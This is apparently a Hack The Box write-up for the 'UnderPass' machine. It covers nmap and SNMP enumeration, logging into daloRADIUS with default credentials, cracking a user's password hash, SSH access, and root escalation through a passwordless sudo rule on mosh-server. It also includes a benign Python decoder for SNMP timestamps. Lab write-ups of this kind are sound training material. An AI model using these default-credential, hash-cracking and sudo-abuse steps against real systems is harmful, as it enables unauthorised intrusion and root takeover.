# UnderPass Hackthebox Writeup

An easy box from HTB. We first get into daloRADIUS with its default credentials and use it to expose a user together with his (weak) password hash, crack the hash to recover the plaintext password, and use that password to log in to the host via SSH. Easy win! Lastly we escalate our privileges by abusing a sudo rule for Mosh (Mobile Shell). 🚀

## Enumeration

I start off with my nmap scan:

```shell
➜ nmap -sS -sV -sC 10.10.11.48 -oN nmap-scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 01:32 EAT
Nmap scan report for 10.10.11.48
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds
```

Only two TCP ports are open, and a directory search against port 80 doesn't reveal anything juicy, so I proceed to run a UDP scan with nmap:

```shell
➜ nmap -sU -sV --top-ports=10 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 01:42 EAT
Nmap scan report for 10.10.11.48
Host is up (0.14s latency).

PORT     STATE  SERVICE      VERSION
53/udp   closed domain
67/udp   closed dhcps
123/udp  closed ntp
135/udp  closed msrpc
137/udp  closed netbios-ns
138/udp  closed netbios-dgm
161/udp  open   snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
445/udp  closed microsoft-ds
631/udp  closed ipp
1434/udp closed ms-sql-m
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

Service detection performed.
Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds
```

Port 161 (SNMP) is open, and the `Service Info` line already leaks the hostname plus a hint about what is running on the box.

### SNMP Enumeration

You can learn more about SNMP pentesting from [here](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html). I use `snmpbulkwalk` with the `public` community string to dump the data behind every readable OID:

```shell
snmpbulkwalk -c public -v2c 10.10.11.48 .
```

![image](https://hackmd.io/_uploads/SJFwD-3leg.png)

We get three interesting things from the output:

1. steve@underpass.htb
2. A Hex-STRING `07E90509163303002B0000` (an SNMP DateAndTime value, i.e. a timestamp shown as raw bytes)
3. "UnDerPass.htb is the only daloradius server in the basin!"

This is the second time daloradius shows up; searching for it in the browser you should find that daloRADIUS is a web management application for RADIUS servers:

![image](https://hackmd.io/_uploads/S1PNFZ3gll.png)

Trying to reach it on port 80 only returned a Forbidden response.

## Initial Foothold

Reviewing the [github repository](https://github.com/lirantal/daloradius) we can easily identify the login path, and there is an [issue](https://github.com/lirantal/daloradius/issues/573) showing the default credentials the application ships with.
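Before using those credentials, a short aside on the second SNMP finding above, since the hex string is listed without saying what it is. `07E90509163303002B0000` is an 11-octet SNMPv2-TC DateAndTime value (RFC 2579): two bytes of year, then month, day, hour, minute, second, deci-seconds, a `+`/`-` direction byte and the hours and minutes of the UTC offset; net-snmp prints such values as a raw Hex-STRING when the MIB defining the OID is not loaded. The decoder below is an added example written for this writeup, not code from the box, from net-snmp or from daloRADIUS; the only input it assumes is the hex string copied from the walk, which decodes to 2025-05-09 22:51:03 +00:00, consistent with the scan times (01:42 EAT is 22:42 UTC). The other inputs in the comments are constructed to show the 8-octet form and a non-zero offset.

```python
"""Decode an SNMP DateAndTime value (RFC 2579, SNMPv2-TC) as dumped by snmpwalk.

Added example for this writeup; not code from the box, net-snmp or daloRADIUS.
HEX_FROM_WALK is the Hex-STRING copied from the SNMP section above.
"""
from datetime import datetime, timedelta, timezone

HEX_FROM_WALK = "07E90509163303002B0000"


def decode_date_and_time(hex_value: str) -> datetime:
    """Parse an 8- or 11-octet DateAndTime value into a datetime.

    Octet layout: year (2 bytes, big-endian), month, day, hour, minute,
    second, deci-seconds, then optionally the UTC direction byte ('+' or '-')
    and the hours and minutes of the offset. The 8-octet form carries no
    offset, so it is returned as a naive datetime.
    """
    raw = bytes.fromhex(hex_value.replace(" ", ""))  # snmpwalk may space the octets
    if len(raw) not in (8, 11):
        raise ValueError(f"DateAndTime must be 8 or 11 octets, got {len(raw)}")
    year = int.from_bytes(raw[0:2], "big")
    month, day, hour, minute, second, deci = raw[2:8]
    if deci > 9:
        raise ValueError(f"deci-seconds out of range: {deci}")
    tz = None
    if len(raw) == 11:
        direction = chr(raw[8])
        if direction not in "+-":
            raise ValueError(f"bad UTC direction byte: {raw[8]:#04x}")
        offset = timedelta(hours=raw[9], minutes=raw[10])
        tz = timezone(offset if direction == "+" else -offset)
    # datetime() itself rejects an out-of-range month/day/hour, which catches
    # the case where something other than a DateAndTime was fed in.
    return datetime(year, month, day, hour, minute, second,
                    microsecond=deci * 100_000, tzinfo=tz)


def to_utc(ts: datetime) -> datetime:
    """Normalise to UTC so the value can be lined up with the nmap timestamps;
    a naive (8-octet) value is assumed to already be UTC."""
    if ts.tzinfo is None:
        return ts.replace(tzinfo=timezone.utc)
    return ts.astimezone(timezone.utc)


if __name__ == "__main__":
    # Constructed variants: "07E9050916330300" (8 octets, no offset) and
    # "07E90509113303002D0500" (same instant written as 17:51:03 -05:00).
    ts = decode_date_and_time(HEX_FROM_WALK)
    print(f"{HEX_FROM_WALK} -> {ts.isoformat()} (UTC: {to_utc(ts).isoformat()})")
```

Run the file directly to print the decoded value. Bad lengths, a deci-second byte above 9 or a direction byte other than `+`/`-` raise `ValueError` rather than silently producing a plausible but wrong timestamp, which matters when you are using the clock to correlate SNMP data with other evidence.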
I proceed to access the operators' login page and use the default credentials `administrator:radius`:

![image](https://hackmd.io/_uploads/HJTMjZ3egx.png)

Listing the available users we get a user named `svcMosh` with a hashed password:

![image](https://hackmd.io/_uploads/SyOJh-2glg.png)

Using john, hashcat or CrackStation, whichever tool you prefer, you can easily crack the hash and get the plaintext password: `underwaterfriends`

![image](https://hackmd.io/_uploads/S1wVnZ3gxl.png)

Using the credentials `svcMosh:underwaterfriends` we are able to log in via SSH:

![image](https://hackmd.io/_uploads/B1x02-3lxl.png)

## Privilege Escalation

The user is found to have sudo privileges on the binary `/usr/bin/mosh-server`, with no password required:

```shell
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
```

[Mosh](https://mosh.org/) is a remote terminal tool, "a replacement for interactive SSH terminals". The [documentation](https://mosh.org/#techinfo) explains how it works: `mosh-server` is normally started by the client over SSH, spawns a shell for the user it runs as, prints a one-time session key and a UDP port, and `mosh-client` then talks to that port directly using the key. Because the sudo rule lets us run `mosh-server` as root, the shell it spawns is a root shell, and anyone holding the key who can reach the UDP port gets it (the HTB VPN gives us that reachability here).

We first install mosh on our host:

```shell
sudo apt-get install mosh
```

We then start a mosh server on the box on port 61337 with `sudo mosh-server new -p 61337`; it prints a line of the form `MOSH CONNECT 61337 <key>`. On our host we connect back to it with `MOSH_KEY={VALUE_OF_KEY} mosh-client 10.10.11.48 61337` and get an interactive shell session as root!

![image](https://hackmd.io/_uploads/B120lfnglx.png)

---

***📨 Got feedback? [contact me](mailto:iam@tahaafarooq.dev) 📨***

***☕ Like this content? Consider [buying me a coffee](https://buymeacoffee.com/tahaafarooq) ☕***